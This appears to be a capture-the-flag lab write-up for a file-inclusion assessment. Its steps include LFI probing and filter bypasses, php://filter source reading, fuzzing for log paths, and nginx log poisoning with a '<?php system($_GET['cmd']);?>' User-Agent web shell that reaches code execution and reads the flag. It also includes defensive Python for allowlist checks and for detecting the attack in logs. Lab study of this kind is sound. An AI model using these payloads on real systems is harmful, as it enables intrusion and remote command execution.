FILE INCLUSION
OBJECTIVE: perform a web application penetration assessment with a focus on file inclusion/path traversal vulnerabilities against a company's publicly facing website.
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
WALK THE APPLICATION
#walk the web application and identify potential entry points - look for parameters, pages, etc., where user input can be provided
root@htb:~$ BROWSER > 94.237.54.42:31025
* http://94.237.60.159:50538/index.php?page=contact
- the contact page might be a potential LFI entry point

PERFORM LFI DISCOVERY
#step 1A: identify whether LFI vulnerability exists - perform discovery test
#via basic test
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=/etc/passwd
* no output or errors received
#via path traversal
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=../../../../../etc/passwd
* Invalid input detected!
#via filename prefix
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=/../../../etc/passwd
* Invalid input detected!
#step 1B: identify whether LFI vulnerability exists - perform bypass
#via non-recursive path traversal filter test
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=....//....//....//....//etc/passwd
* Invalid input detected!
#via url encoding
root@oco:~$ burpsuite
BURP > Decoder
input: ../../../../etc/passwd
encode as: URL
output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
* the vulnerable application will decode the encoded payload
* Invalid input detected!
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=./contact/../../../../etc/passwd
* Invalid input detected!
************** NONE WORKED **************************

PERFORM SOURCE CODE DISCOVERY
root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .
#fuzz for php files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.54.42:31025/FUZZ.php -ic
contact [Status: 200, Size: 2714, Words: 773, Lines: 78, Duration: 80ms]
index [Status: 200, Size: 15829, Words: 3435, Lines: 401, Duration: 80ms]
about [Status: 200, Size: 10313, Words: 2398, Lines: 214, Duration: 81ms]
main [Status: 200, Size: 11507, Words: 2639, Lines: 284, Duration: 78ms]
industries [Status: 200, Size: 8082, Words: 2018, Lines: 197, Duration: 79ms]
error [Status: 200, Size: 199, Words: 41, Lines: 10, Duration: 79ms]
* the -ic flag ignores wordlist comments
* do not limit the scan to HTTP 200 response codes; include codes such as `301`, `302` and `403` as well, since the source of those pages can still be read through the filter and may contain valuable information
#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=contact
* view the page source to ensure the entire encoded string is copied, else it won't fully decode
* ALT: curl http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=contact
root@htb:~$ echo 'PGRpdiBjbGFzcz0...snip...' | base64 -d
...SNIP...
...
...SNIP...
* nothing interesting
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=index
* view the page source to ensure the entire encoded string is copied, else it won't fully decode
* ALT: curl http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=index
root@htb:~$ echo 'PCFET0NW...snip...' | base64 -d
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
<?php
if(!isset($_GET['page'])) {
    include "main.php";
}
else {
    $page = $_GET['page'];
    if (strpos($page, "..") !== false) {
        include "error.php";
    }
    else {
        include $page . ".php";
    }
}
?>

EXPLORE THE IDENTIFIED ADMIN PAGE
#explore the admin page
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php
chat log
service log
system log
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=chat.log
<138>Sep 09 07:28:01 mante4575 in[7570]: If we synthesize the circuit, we can get to the SCSI array through the neural SCSI interface!
<112>Sep 09 07:28:01 yundt6125 sunt[87]: We need to parse the virtual FTP bandwidth!
<30>Sep 09 07:28:01 dicki1780 quia[4511]: Try to input the HDD card, maybe it will compress the primary sensor!
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=http.log
{"host":"58.96.247.205", "user-identifier":"-", "datetime":"09/Sep/2020:07:28:32 +0000", "method": "GET", "request": "/value-added/eyeballs", "protocol":"HTTP/1.1", "status":501, "bytes":2211, "referer": "https://www.principalconvergence.info/content"}
{"host":"164.239.74.66", "user-identifier":"denesik4023", "datetime":"09/Sep/2020:07:28:32 +0000", "method": "PUT", "request": "/syndicate/engineer", "protocol":"HTTP/1.0", "status":405, "bytes":18494, "referer": "https://www.corporateseize.org/e-tailers/holistic/enhance"}
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=system.log
<138>3 2020-09-09T07:27:49.129Z investorunleash.org eos 3425 ID998 - I'Ll parse the online AGP panel, that should array the PNG program!
<14>3 2020-09-09T07:27:49.129Z internalconvergence.org quo 8246 ID412 - Try to parse the SMTP alarm, maybe it will override the multi-byte application!
<112>1 2020-09-09T07:27:49.129Z chiefschemas.info suscipit 1261 ID785 - Try to hack the CSS firewall, maybe it will quantify the virtual capacitor!
<134>1 2020-09-09T07:27:49.129Z principalvirtual.com magni 1276 ID240 - The AGP bandwidth is down, generate the redundant hard drive so we can calculate the IB application!
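Before probing the admin page's log parameter, the index.php source recovered above explains the earlier results on page=: PHP hands $_GET over already URL-decoded, so the strpos($page, "..") denylist caught every traversal variant, yet it let php://filter straight through because that string contains no "..". The following model is an added example (not code from the lab or the HTB module) that re-runs those same inputs against that check and against an allowlist built from the pages ffuf found (assumed here to be the complete set):

```python
from urllib.parse import unquote

# Pages the site actually serves: the names ffuf found on this page (assumed complete).
ALLOWED_PAGES = {"main", "contact", "about", "industries"}

def denylist_check(page):
    """Model of the index.php check: $_GET['page'] arrives URL-decoded, then
    strpos($page, "..") rejects anything containing '..'."""
    return ".." not in unquote(page)

def allowlist_check(page):
    """Hardened form: the value must name one known page exactly, so neither
    traversal nor a php:// wrapper ever reaches include()."""
    return unquote(page) in ALLOWED_PAGES

# The inputs tried against page= in this walkthrough (constructed list, same strings).
PAYLOADS = [
    "contact",
    "../../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64",
    "./contact/../../../../etc/passwd",
    "php://filter/read=convert.base64-encode/resource=index",
]

def compare(payloads=PAYLOADS):
    """Map each input to (passes the '..' denylist, passes the allowlist)."""
    return {p: (denylist_check(p), allowlist_check(p)) for p in payloads}

if __name__ == "__main__":
    for p, (deny_ok, allow_ok) in compare().items():
        print(f"denylist: {'pass ' if deny_ok else 'BLOCK'}  "
              f"allowlist: {'pass ' if allow_ok else 'BLOCK'}  {p}")
```

Only the wrapper payload splits the two checks, which is exactly the gap the source-code read exploited.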

PERFORM LFI DISCOVERY ON THE ADMIN PAGE
#step 1A: identify whether LFI vulnerability exists - perform discovery test
#via basic test
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=/etc/passwd
* no output or errors received
#via path traversal
#manually determine the number of ../ required for path traversal
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../etc/passwd
* no effect
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../etc/passwd
* no effect
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin

EXPLOIT THE LFI WITH LOG POISONING TO GAIN RCE
#identify the type of server used by the target - nginx or apache
root@htb:~$ curl -I 94.237.50.242:37264
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 10 Feb 2025 00:29:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.22
#STEP 2: test whether apache or nginx's logs can be accessed
root@oco:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/index.php?log=../../../../../etc.passwd HTTP/1.1" 200 935 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/style.css HTTP/1.1" 200 24858 "http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc.passwd" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/c.css HTTP/1.1" 404 125 "http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc.passwd" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
* nginx's log location is /var/log/nginx on Linux and c:\nginx\log\ on Windows. the nginx logs are readable by low privileged users by default (e.g., www-data) and can be exploited the same way as apache's access.log.
- nginx's log files are named access.log for access logs and error.log for error logs.
* the User-Agent header can be controlled by attackers through the HTTP request headers and can be poisoned
- logs tend to be huge, and loading them through an LFI vulnerability may take a while, or even crash the server in worst-case scenarios
#use this alternate method of locating log files if the defaults aren't available
root@htb:~$ find / -iname LFI* -type f 2>/dev/null
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/usr/share/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
root@htb:~$ cp /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt .
root@htb:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/FUZZ' | grep -iE 'log'
...
/var/mysql.log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/saf/_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/spool/logs [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/saf/port/log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/log/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/logs/access.log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/../../var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 79ms]
/var/www/log/error_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 79ms]
../../../../../../../var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]

#STEP 3: modify the User-Agent header to the marker string "Apache Log Poisoning" and confirm it lands in the log
root@oco:~$ burpsuite
BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log
BURP > Proxy > Intercept
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
* send the request to repeater
BURP > Repeater
Request
...
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
* change the value of "User-Agent" string to an {arbitraryValue}
- this tests whether the modified user-agent string will take effect prior to creating an rce payload
- set the user-agent string to something that can be easily identified
Response
...
10.30.18.253 - - [10/Feb/2025:01:02:37 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log////////../../../etc/passwd HTTP/1.1" 200 1416 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.30.18.253 - - [10/Feb/2025:01:08:25 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 90671 "-" "Apache Log Poisoning"
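The marker sitting in the User-Agent field above is exactly what a defender reading the same log would hunt for. The following detector is an added example (not part of this lab or the HTB module) that parses nginx combined-format lines and flags traversal sequences and php:// wrappers in the request, plus PHP open tags in the User-Agent or Referer fields, over a constructed sample modelled on the lines shown on this page:

```python
import re

# nginx "combined" access-log format, as seen in the access.log read on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Indicators: traversal sequences (plain or URL-encoded) and PHP stream wrappers
# in the request line, PHP open tags in attacker-controlled header fields.
TRAVERSAL = re.compile(r'\.\./|\.\.\\|%2e%2e(%2f|/)|\.\.%2f', re.I)
WRAPPER = re.compile(r'\b(php|data|expect|input|zip|phar)://', re.I)
PHP_TAG = re.compile(r'<\?(php|=)', re.I)

def classify(line):
    """Return {'ip', 'request', 'findings'} for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; a real pipeline would count these
    findings = []
    if TRAVERSAL.search(m['request']):
        findings.append('path-traversal')
    if WRAPPER.search(m['request']):
        findings.append('php-wrapper')
    # A PHP tag in User-Agent or Referer is the log-poisoning signature: it is
    # inert text in the file until the log is pulled through include().
    for field in ('agent', 'referer'):
        if PHP_TAG.search(m[field]):
            findings.append(f'php-tag-in-{field}')
    if not findings:
        return None
    return {'ip': m['ip'], 'request': m['request'], 'findings': findings}

def scan(lines):
    """Keep only flagged entries; an alert rule would fire on any of them."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample, modelled on the access.log lines shown in this walkthrough.
SAMPLE = [
    '10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/style.css HTTP/1.1" 200 24858 "-" "Mozilla/5.0"',
    '10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/index.php?log=../../../../../etc/passwd HTTP/1.1" 200 935 "-" "Mozilla/5.0"',
    '10.30.18.253 - - [10/Feb/2025:01:08:25 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.30.18.253 - - [10/Feb/2025:01:19:04 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1" 200 91027 "-" "<?php system($_GET[\'cmd\']);?>"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit['ip'], ', '.join(hit['findings']), hit['request'])
```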
#STEP 4: poison the User-Agent header by setting it to a basic PHP web shell
BURP > Repeater
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1    //note the added &cmd=ls+/ parameter, sent while the User-Agent string is set to the php web shell
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Response
...
10.30.18.253 - - [10/Feb/2025:01:19:04 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1" 200 91027 "-" "bin
dev
etc
flag_dacc60f2348d.txt
home
...
BURP > Repeater
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1    //note the added &cmd=cat+/flag_dacc60f2348d.txt parameter, sent while the User-Agent string is set to the php web shell
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Response
...
10.30.18.253 - - [10/Feb/2025:01:28:41 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1" 200 91601 "-" "a9a892dbc9faf9a014f58e007721835e
* change the value of "User-Agent" string to a php web shell along with the cmd in one execution
* ALT:
curl -s 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/'
10.30.18.253 - - [10/Feb/2025:01:19:04 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1" 200 91027 "-" "bin
dev
etc
flag_dacc60f2348d.txt
home
...
curl -s 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt'
10.30.18.253 - - [10/Feb/2025:01:28:41 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1" 200 91601 "-" "a9a892dbc9faf9a014f58e007721835e"